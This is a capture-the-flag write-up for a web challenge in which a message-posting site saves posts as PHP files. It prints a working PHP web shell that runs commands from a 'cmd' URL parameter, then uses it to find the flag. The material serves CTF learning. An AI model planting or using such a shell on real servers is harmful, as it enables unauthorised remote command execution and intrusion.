Category

Web

Description

Look at this neat website I found! It’s not complete yet, but when it is, it will give you personlized music recommendations like you’ve never seen before! I think you should check it out. I left a Valentine as a message on the website 😁

Solution

For this challenge we have a web page where we can post messages, after saving a message we get a text like the following.

Your message was saved at /message/nnxwh1999.php.

Posting a PHP-web shell like the following, we can get remote code execution.

<?php
if (!empty($_GET['cmd'])) {
    $cmd = shell_exec($_GET['cmd']);
    echo $cmd;
}
?>

Now all we have to do is to run grep valentine using our uploaded shell, and we get the flag in the output.

valentine{n3ver_g0nn4_give_y0u_up}